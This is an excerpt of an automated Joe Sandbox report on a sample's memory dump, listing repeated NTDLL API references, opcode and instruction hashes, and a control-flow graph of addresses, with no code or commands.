                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 7faaa26a1c566d0eea4b60af157018391e70d6cce72472070db88736816a18d8
                                  • Instruction ID: 1d420a7f256f9baf7f4b1eafc65e72d203875681aadb7c4a4f7ae38850191a84
                                  • Opcode Fuzzy Hash: 7faaa26a1c566d0eea4b60af157018391e70d6cce72472070db88736816a18d8
                                  • Instruction Fuzzy Hash: 37520774A04228CFCB64EF64D89879DB7B6BF88206F5085E9E509A3744CF349E85CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 15bd98c36387be3c1d8023affa9bb399f647268bf6379950a5515ce39de57a04
                                  • Instruction ID: 1c903aaa1166b4e9ff7d550d4b412c02921398436df62266806edf4c1d69c39b
                                  • Opcode Fuzzy Hash: 15bd98c36387be3c1d8023affa9bb399f647268bf6379950a5515ce39de57a04
                                  • Instruction Fuzzy Hash: 965206B4A04228CFCB64EF64D89879DB7B6BF88206F5085E9E509A3744CF349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: ba635a70e3f6c21516b3bc69f694c83d48a5c1094e757a4fc5ccefbbebe4456a
                                  • Instruction ID: 412d5b0c129ad258cafaabf97cae8ba7767d1645f08aaaa0f2dfa2c29b084d8f
                                  • Opcode Fuzzy Hash: ba635a70e3f6c21516b3bc69f694c83d48a5c1094e757a4fc5ccefbbebe4456a
                                  • Instruction Fuzzy Hash: 4B5207B4A04228CFCB64EF64D89879DB7B6BF88206F5085E9E509A3744CF349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: a63e2811349b68b9ca16c37c5d6a7a8757bf4641f0e635da607bd9a6bd9f568c
                                  • Instruction ID: 48fcfb724197c60a3a3ec3f548c0bcd45cc07a9c3e88131b998728163dc65208
                                  • Opcode Fuzzy Hash: a63e2811349b68b9ca16c37c5d6a7a8757bf4641f0e635da607bd9a6bd9f568c
                                  • Instruction Fuzzy Hash: A55206B4A04228CFCB64EF64D89879DB7B6BF88206F5085E9E509A3744CF349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: bac308755d01f5cd09b30ad52ac4682ac10dcae97141f69e6c315d49c0b185ab
                                  • Instruction ID: f9222d233101f16a4dc4799f7ab6444ddf117a62b4dd4c49ef9356dd3d379627
                                  • Opcode Fuzzy Hash: bac308755d01f5cd09b30ad52ac4682ac10dcae97141f69e6c315d49c0b185ab
                                  • Instruction Fuzzy Hash: B14207B4A04228CFCB64EF64D89879DB7B6BF88206F5085E9E509A3744CF349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 297dfa1db61d13bacfcd812f44cfd4c9922ae21358c9b63b32f9965b8e1e34d9
                                  • Instruction ID: 6051eaf669927b51200d460cd032cb56369925e13a0b0910b364a74c6dc851fc
                                  • Opcode Fuzzy Hash: 297dfa1db61d13bacfcd812f44cfd4c9922ae21358c9b63b32f9965b8e1e34d9
                                  • Instruction Fuzzy Hash: DE4206B4A04228CFCB64EF64D89879DB7B6BF88206F5085E9E549A3740CF349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 8444d59d030c7da59630cc83c166aaaa6c518a74367abd465191070fdf852698
                                  • Instruction ID: 5b685ae9994bcbc16c7d2d7644464c4523f30f4879d0cf178b6bda1003ef6ea2
                                  • Opcode Fuzzy Hash: 8444d59d030c7da59630cc83c166aaaa6c518a74367abd465191070fdf852698
                                  • Instruction Fuzzy Hash: 504206B4A04228CFCB64EF64D89879DB7B6BF88206F5085E9E509A3740CF349E85CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: cd867255989d01dabd3864339f1aafbb09b358e031e136e3715386e696805988
                                  • Instruction ID: a1bc96a0ff8d7d5f1f9dd6ae620e5ea6fc111111f1092d3ced3e5af6bf035482
                                  • Opcode Fuzzy Hash: cd867255989d01dabd3864339f1aafbb09b358e031e136e3715386e696805988
                                  • Instruction Fuzzy Hash: 794206B4A04228CFCB64EF64D89879DB7B6BF88206F5085E9E509A3740CF349E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: cb497f5a337db19dca1f236bf0a560d99a263ec94a509ad70bb2569a7783918c
                                  • Instruction ID: 42f957c0a30d364b3a668f89c012a523f4a3b7f3e67117e9089357fd553dda04
                                  • Opcode Fuzzy Hash: cb497f5a337db19dca1f236bf0a560d99a263ec94a509ad70bb2569a7783918c
                                  • Instruction Fuzzy Hash: F44207B4A04228CFCB64EF64D85879DB7B6BF88206F5085E9E909A3754CF349E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 2d6e4f2030ac2b4f1ae6c5557b3e23b89d21e9bc523ca7f755e0d33f4e7cf284
                                  • Instruction ID: 4c3447f400000b1bd170504c727736fd43fe4f0dfadddd30e0140d96aabee90f
                                  • Opcode Fuzzy Hash: 2d6e4f2030ac2b4f1ae6c5557b3e23b89d21e9bc523ca7f755e0d33f4e7cf284
                                  • Instruction Fuzzy Hash: 954207B4A04228CFCB64EF64D89879DB7B6BF88206F5085E9E509A3754CF349E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D0E69
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: e5913c0da839ed7674fd98a218edee6921707fdf309165a083ae576b8156d15c
                                  • Instruction ID: 79a45b73d8bb52c282c45c3d3d2930e2b343ee2bf8d03154f1d4637bcf85f859
                                  • Opcode Fuzzy Hash: e5913c0da839ed7674fd98a218edee6921707fdf309165a083ae576b8156d15c
                                  • Instruction Fuzzy Hash: 714207B4A04228CFCB64EF64D85879DB7B6BF88206F5085E9E909A3750CF349E85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 295f92c6b95d051f66517c7f149d21dd9a256dfba7d95f0a57bb49d55fad298b
                                  • Instruction ID: c697a7406a81d1ed7dc0b4f8fee9c4b3de8df50e2c3351fe10bb25996de70a88
                                  • Opcode Fuzzy Hash: 295f92c6b95d051f66517c7f149d21dd9a256dfba7d95f0a57bb49d55fad298b
                                  • Instruction Fuzzy Hash: CD3208B4A04228CFCB64EF64D89879DB7B6BF88205F5085E9E909A3750CF349E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 439863250b2a1d1c7d2e80036e8f3e76c9f987cfd04c4e43e384d6bfeeedf7b7
                                  • Instruction ID: 0e4d77113d5e64034539aa83596888b2db13c9d744431a2b07704f0582b5f3ce
                                  • Opcode Fuzzy Hash: 439863250b2a1d1c7d2e80036e8f3e76c9f987cfd04c4e43e384d6bfeeedf7b7
                                  • Instruction Fuzzy Hash: 6F3207B4A04228CFCB64EF64D85879DB7B6BF88205F5085E9E909A3750CF349E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 1752d9966c928ca3032889a5c67d1f942698e98a4df22c35af68a67d303ab479
                                  • Instruction ID: 2a1d0f3b39efb410976351360b1d654c659ef1099636d787ccade7f7d96ac92d
                                  • Opcode Fuzzy Hash: 1752d9966c928ca3032889a5c67d1f942698e98a4df22c35af68a67d303ab479
                                  • Instruction Fuzzy Hash: B13207B4A04228CFCB64EF64D89879DB7B6BF88205F5085E9E909A3750CF349E85CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: d20cead69770fe506bc9a0dcb018bbec7ff27cecc0f7fd3e0dc3118ddf35df05
                                  • Instruction ID: a11cf352b38e0598a5c3c51bd09009d4ee0891647b275932131b0d946afb54b7
                                  • Opcode Fuzzy Hash: d20cead69770fe506bc9a0dcb018bbec7ff27cecc0f7fd3e0dc3118ddf35df05
                                  • Instruction Fuzzy Hash: B33207B4A04228CFCB64EF64D89879DB7B6BF88205F5085E9E909A3750CF349E85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 5928a38b49657a44be4354be27a77e39731fae53a4ca64ec15eba7d585237840
                                  • Instruction ID: f0eb5f4d6e8e32d83766646e309204fb787061445a32840adfdf7c47b94f5fcf
                                  • Opcode Fuzzy Hash: 5928a38b49657a44be4354be27a77e39731fae53a4ca64ec15eba7d585237840
                                  • Instruction Fuzzy Hash: BD3207B4A04228CFCB64EF64D89879DB7B6BF88205F5085E9E909A3750CF349E85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 9e85d9cc3a4a2494185f00fa9bb4b07c1f1459804f469691ef905c2285a0aabb
                                  • Instruction ID: ccc1837dbe2a91d37f737b03475f6be2817720a7153feed0ecf308ebee3cdafc
                                  • Opcode Fuzzy Hash: 9e85d9cc3a4a2494185f00fa9bb4b07c1f1459804f469691ef905c2285a0aabb
                                  • Instruction Fuzzy Hash: A13216B4A04228CFCB64EF64D89879DB7B6BF88205F5085E9E909A3750CF349E85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 43938bfd5e8ac1f23b76c576bc6da2a6a0bfede5a600bc715832a649d8c52fef
                                  • Instruction ID: b7182369b9c39e9b1505dec2ba010935b25a9635f0c8d976c6ec5a8e1e5fa54b
                                  • Opcode Fuzzy Hash: 43938bfd5e8ac1f23b76c576bc6da2a6a0bfede5a600bc715832a649d8c52fef
                                  • Instruction Fuzzy Hash: DA2216B4A04228CFCB64EF64D89879DB7B6BF88205F5085E9E909A3750CF349E85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 9ddb6c130d653b74368c19f40858f87d823822ec4eb0c24663d58dcae9d61504
                                  • Instruction ID: 3edb99e706cd84a54b1e9839d9534cb90cc9ddedac8afafa1e037689b4d6c9f3
                                  • Opcode Fuzzy Hash: 9ddb6c130d653b74368c19f40858f87d823822ec4eb0c24663d58dcae9d61504
                                  • Instruction Fuzzy Hash: 6B2216B4A04228CFCB64EF64D89879DB7B6BF88205F5085E9E909A3750CF349E85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: 46cb3f2b053b5820e7a4dc17498dcc76dfe226156f0cbd271026437f27207c62
                                  • Instruction ID: 55a15a1e948c89434627858567831a4f8fed18c297d5baed3ec62976e48ed989
                                  • Opcode Fuzzy Hash: 46cb3f2b053b5820e7a4dc17498dcc76dfe226156f0cbd271026437f27207c62
                                  • Instruction Fuzzy Hash: 292217B4A04228CFCB64EF64D89879DB7B6BF88205F5085E9E909A3750CF349E85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 9899 10d10e5-10d11ac KiUserExceptionDispatcher 10196 10d11ac call 10c87bd 9899->10196 10197 10d11ac call 10c883f 9899->10197 10198 10d11ac call 10c895f 9899->10198 10199 10d11ac call 10c87c0 9899->10199 9909 10d11b2-10d1278 10211 10d1278 call 10c922c 9909->10211 10212 10d1278 call 10c937f 9909->10212 10213 10d1278 call 10c9278 9909->10213 10214 10d1278 call 10c9230 9909->10214 9918 10d127e-10d12c0 10215 10d12c0 call 10c93e0 9918->10215 10216 10d12c0 call 10c93f0 9918->10216 9921 10d12c6-10d13f6 call 10c9e98 10227 10d13f6 call 10cabcf 9921->10227 10228 10d13f6 call 10cab97 9921->10228 9934 10d13fc-10d143e 10231 10d143e call 10cac89 9934->10231 10232 10d143e call 10cac90 9934->10232 9937 10d1444-10d1516 10194 10d1516 call 10cbdb8 9937->10194 10195 10d1516 call 10cbda7 9937->10195 9946 10d151c-10d155e 10200 10d155e call 10cc2de 9946->10200 10201 10d155e call 10cc338 9946->10201 10202 10d155e call 10cc388 9946->10202 10203 10d155e call 10cc3d8 9946->10203 10204 10d155e call 10cbdb8 9946->10204 10205 10d155e call 10cc044 9946->10205 10206 10d155e call 10cbda7 9946->10206 10207 10d155e call 10cc380 9946->10207 9949 10d1564-10d1619 10217 10d161f call 10cdd5d 9949->10217 10218 10d161f call 10cdc38 9949->10218 10219 10d161f call 10cdc88 9949->10219 10220 10d161f call 10cdbe0 9949->10220 10221 10d161f call 10cdbf0 9949->10221 9959 10d1625-10d1647 10222 10d1649 call 10cde28 9959->10222 10223 10d1649 call 10cde20 9959->10223 9963 10d164f-10d1675 10225 10d1677 call 10cde28 9963->10225 10226 10d1677 call 10cde20 9963->10226 9967 10d167d-10d16a3 10229 10d16a5 call 10cde28 9967->10229 10230 10d16a5 call 10cde20 9967->10230 9971 10d16ab-10d16d1 10187 10d16d3 call 10cde28 9971->10187 10188 10d16d3 call 10cde20 9971->10188 9975 10d16d9-10d16ff 10192 10d1701 call 10cde28 9975->10192 10193 10d1701 call 10cde20 9975->10193 9979 10d1707-10d1773 LdrInitializeThunk 9980 10d1a8d-10d1ba1 call 10ced1f KiUserExceptionDispatcher 9979->9980 9981 10d1779-10d179d 9979->9981 10189 10d1ba1 call 10cf41f 9980->10189 10190 10d1ba1 call 10cf368 9980->10190 10191 10d1ba1 call 10cf370 9980->10191 9986 10d18ee-10d1912 9981->9986 9987 10d17a3 9981->9987 9997 10d1918-10d191a 9986->9997 9998 10d1914 9986->9998 9987->9986 9989 10d17a9-10d18e9 9987->9989 9989->9980 10001 10d1921-10d194b 9997->10001 9999 10d191c 9998->9999 10000 10d1916 9998->10000 9999->10001 10000->9997 10009 10d194d 10001->10009 10010 10d1951-10d1953 10001->10010 10012 10d194f 10009->10012 10013 10d1955 10009->10013 10014 10d195a-10d1960 10010->10014 10012->10010 10013->10014 10014->9980 10017 10d1966-10d1a64 10014->10017 10017->9980 10020 10d1ba7-10d1bf3 10027 10d1edf-10d1ef0 10020->10027 10028 10d1bf9-10d1c1c 10020->10028 10034 10d2255-10d225c 10027->10034 10035 10d1ef6-10d1efd 10027->10035 10043 10d1ec7-10d1edc 10028->10043 10044 10d1c22-10d1c94 10028->10044 10038 10d22de-10d22e8 10034->10038 10039 10d2262-10d22d3 10034->10039 10041 10d1f94-10d1f9b 10035->10041 10042 10d1f03-10d1f11 10035->10042 10045 10d232e-10d2340 10038->10045 10046 10d22ea-10d2327 10038->10046 10039->10038 10047 10d210b-10d2112 10041->10047 10048 10d1fa1-10d20e6 10041->10048 10208 10d1f17 call 10cf788 10042->10208 10209 10d1f17 call 10cf787 10042->10209 10061 10d1edd 10043->10061 10087 10d1eaf-10d1ec1 10044->10087 10088 10d1c9a-10d1ca1 10044->10088 10046->10045 10047->10034 10054 10d2118-10d2238 10047->10054 10048->10034 10054->10034 10061->10061 10069 10d1f1d-10d1f57 10097 10d1f63 10069->10097 10087->10043 10087->10044 10092 10d1ca7-10d1dad 10088->10092 10093 10d1db2-10d1ddd 10088->10093 10092->10087 10093->10087 10098 10d1de3-10d1e86 10093->10098 10097->10034 10098->10087 10187->9975 10188->9975 10189->10020 10190->10020 10191->10020 10192->9979 10193->9979 10194->9946 10195->9946 10196->9909 10197->9909 10198->9909 10199->9909 10200->9949 10201->9949 10202->9949 10203->9949 10204->9949 10205->9949 10206->9949 10207->9949 10208->10069 10209->10069 10211->9918 10212->9918 10213->9918 10214->9918 10215->9921 10216->9921 10217->9959 10218->9959 10219->9959 10220->9959 10221->9959 10222->9963 10223->9963 10225->9967 10226->9967 10227->9934 10228->9934 10229->9971 10230->9971 10231->9937 10232->9937
                                  APIs
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1109
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionUser$InitializeThunk
                                  • String ID:
                                  • API String ID: 2638914809-0
                                  • Opcode ID: ec318c0dac501eb487d4684f28266c91d92aec055a163379760180c4cd290537
                                  • Instruction ID: 136def411e2dcdb4071ded980b41c68b0b7e4e6f169b2e6542d046173f033586
                                  • Opcode Fuzzy Hash: ec318c0dac501eb487d4684f28266c91d92aec055a163379760180c4cd290537
                                  • Instruction Fuzzy Hash: 972216B4A04228CFCB64EF64D89879DB7B6AF88205F5085E9E909A3750CF349E85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
                                  • API ID: DispatcherExceptionInitializeThunkUser
                                  • String ID:
                                  • API String ID: 243558500-0
                                  • Opcode ID: 50d9575d3bb6008c9aea5e824b8ab652bef20c3a5c329f5b8c060351199367c7
                                  • Instruction ID: 65d5d8ef6244177a4d1627e0b0e37dd6aa96c0471d4ec7313743580a7cb0337b
                                  • Opcode Fuzzy Hash: 50d9575d3bb6008c9aea5e824b8ab652bef20c3a5c329f5b8c060351199367c7
                                  • Instruction Fuzzy Hash: 3E2216B4A04228CFCB64EF64C89879DB7B6BF88205F5085E9E909A3750DF349E85CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LdrInitializeThunk.NTDLL ref: 010D170D
                                  • KiUserExceptionDispatcher.NTDLL ref: 010D1B59
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.914340463.00000000010D0000.00000040.00000001.sdmp, Offset: 010D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_10d0000_6Rn5G1VWPB.jbxd
                                  Similarity
